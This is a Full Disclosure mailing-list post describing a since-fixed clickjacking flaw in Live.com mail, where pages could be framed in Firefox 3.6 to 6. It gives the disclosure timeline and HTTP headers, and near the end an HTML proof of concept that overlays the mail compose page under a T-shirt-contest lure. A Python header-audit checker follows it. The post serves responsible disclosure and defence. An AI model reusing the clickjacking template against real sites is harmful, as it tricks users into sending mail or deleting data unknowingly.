On 7/29/13 I reported a Live.com XFO vulnerability to the *Microsoft Security team*, and their investigation has finally come to a conclusion and the bug has been fixed. So, here are the details of the bug and the timeline of the fix. A year ago, on a weekend, I started digging into MS services for bugs.

The timeline of the investigation of the bug: July 29, 2013 - April 16, 2014.

[image: msresponse.jpg]

The interesting part of the vulnerability: all pages were protected against *UI Redressing Attack*, and while doing testing, I normally test the application on all browsers. The weird part comes here: I was able to iframe all the pages of Live.com, including pre-authentication and post-authentication pages, on Mozilla Firefox 3.6.28 to Mozilla Firefox 6. On Chrome and other browsers, the XFO functionality was working perfectly on all pages.

Random announcement, nothing to do with this post: check out the recorded video of the Garage4Hackers Ranchoddas Webcast Series - Browser Crash Analysis by David Rude II aka Bannedit <https://www.youtube.com/watch?v=Qk0ORbFZ81I>

Note: Have a look at the same vulnerability in Facebook Application Installing <http://www.garage4hackers.com/showthread.php?t=2528>

Obviously, you must be thinking why this is happening with Mozilla. After doing some research and consulting with the *G4H team*, I've concluded that it may be an issue with the *Gecko engine*. The test environment was Win 7 and Ubuntu 10, 11, 12.

Note: If you have stumbled upon the same Gecko issue, then please reply on this thread.

Check out the following headers; the XFO header is missing on Gecko/20120306 Firefox/3.6.28 through MF 6.
Code:
    https://blu166.mail.live.com/m/?bfv=wm

    GET /m/?bfv=wm HTTP/1.1
    Host: blu166.mail.live.com
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 115
    Connection: keep-alive
    Cookie:

    HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Content-Encoding: gzip
    Vary: Accept-Encoding
    Server: Microsoft-IIS/7.5
    X-Wlp-StartTime: 29-07-2013 10:10:32 AM
    xxn: 22
    P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
    MSNSERVER: H: BLU166-W22 V: 17.1.6722.6001 D: 2013-07-22T22:56:20
    X-Powered-By: ASP.NET
    Content-Length: 3113
    Date: Mon, 29 Jul 2013 10:10:32 GMT
    Connection: keep-alive
    Set-Cookie: bfv=wm; domain=.live.com; path=/
    Set-Cookie: widecontext=X; path=/; secure
    Set-Cookie: domain=.live.com; path=/
    Set-Cookie: xidseq=7; domain=.live.com; path=/
    Set-Cookie: LD=; domain=.live.com; expires=Mon, 29-Jul-2013 08:30:32 GMT; path=/
    Cache-Control: no-cache, no-store, must-revalidate, no-transform
    Pragma: no-cache
    Expires: -1, -1

Here are some screenshots of basic operations of live.com (I would like to remind you, every page of live.com was vulnerable). The attacker developed this page to attack the victim.
*Composing Email:*

*Uploading Attachment:*

*Deleting Emails:*

[IMG]https://dl.dropboxusercontent.com/u/18007092/ms-click4.png[/IMG]

HTML POC, which I sent to the MS Security Team:

Code:
    <html>
    <!-- This quickly developed POC is for testing purposes -->
    <!-- Visit Garage4hackers.com -->
    <head>
    <title> Live Mail Send Clickjacking - Garage4hackers.com </title>
    <style>
    iframe {
        width:800px;
        height:800px;
        position:absolute;
        top:0;
        left:0;
        filter:alpha(opacity=50); /* in real life opacity=0 */
        opacity:0.5;
    }
    </style>
    </head>
    <body>
    <br> <br> <br> <br> <br> <br> <br> <br>
    <div><center>Bhag Milkha Bhag Competition</center></div>
    <center><b>Click Connect, You will Bhag Milkha Bhag T-shirts. </b></center>
    <iframe src="https://blu166.mail.live.com/m/compose.m/?fid=00000000-0000-0000-0000-000000000001&to=sandeepk.l...@gmail.com"></iframe>
    <a href="http://www.google.com" target="_blank" style="position: relative; left: 0px; top: 220px; z-index: -1;">Connect</a>
    </body>
    </html>

- [S] Garage4hackers.com

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
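The bug above is a per-response gap: the server emitted X-Frame-Options for some User-Agent strings and not others, so a framing-protection check has to be repeated under each browser's UA rather than once. The following is an added example (not code from the post or from Microsoft) that audits captured responses for X-Frame-Options or a CSP frame-ancestors directive; the sample responses are constructed, with the first trimmed from the Gecko response shown in the post.

```python
import re

# Constructed sample responses keyed by the User-Agent they were captured under.
RESPONSES = {
    # Trimmed from the Gecko/Firefox 3.6.28 response in the post: no XFO header.
    "Gecko/20120306 Firefox/3.6.28":
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html; charset=utf-8\r\n"
        "Server: Microsoft-IIS/7.5\r\n"
        "X-Powered-By: ASP.NET\r\n"
        "Cache-Control: no-cache, no-store, must-revalidate, no-transform\r\n\r\n",
    # Constructed: what the post says the other browsers received.
    "Chrome (constructed)":
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html; charset=utf-8\r\n"
        "X-Frame-Options: DENY\r\n\r\n",
    # Constructed: the modern equivalent using CSP frame-ancestors.
    "Firefox (constructed, CSP)":
        "HTTP/1.1 200 OK\r\n"
        "Content-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n\r\n",
}

def parse_headers(raw):
    """Parse a raw HTTP response head into (lowercased name, value) tuples."""
    head = raw.split("\r\n\r\n", 1)[0]
    out = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            out.append((name.strip().lower(), value.strip()))
    return out

def frame_protection(headers):
    """Return the mechanism that blocks framing, or None if the page is frameable.
    Only DENY and SAMEORIGIN count for XFO; ALLOW-FROM is ignored because
    browser support for it was never consistent."""
    for name, value in headers:
        if name == "x-frame-options" and value.upper() in ("DENY", "SAMEORIGIN"):
            return "xfo:" + value.upper()
        if name == "content-security-policy":
            m = re.search(r"frame-ancestors\s+([^;]+)", value, re.I)
            if m:
                return "csp:frame-ancestors " + m.group(1).strip()
    return None

def unprotected_agents(responses):
    """User-Agent labels whose response carries no framing protection at all."""
    return [ua for ua, raw in responses.items()
            if frame_protection(parse_headers(raw)) is None]
```

Run `unprotected_agents(RESPONSES)` against captures taken with each browser's User-Agent to surface exactly the kind of UA-dependent gap reported here.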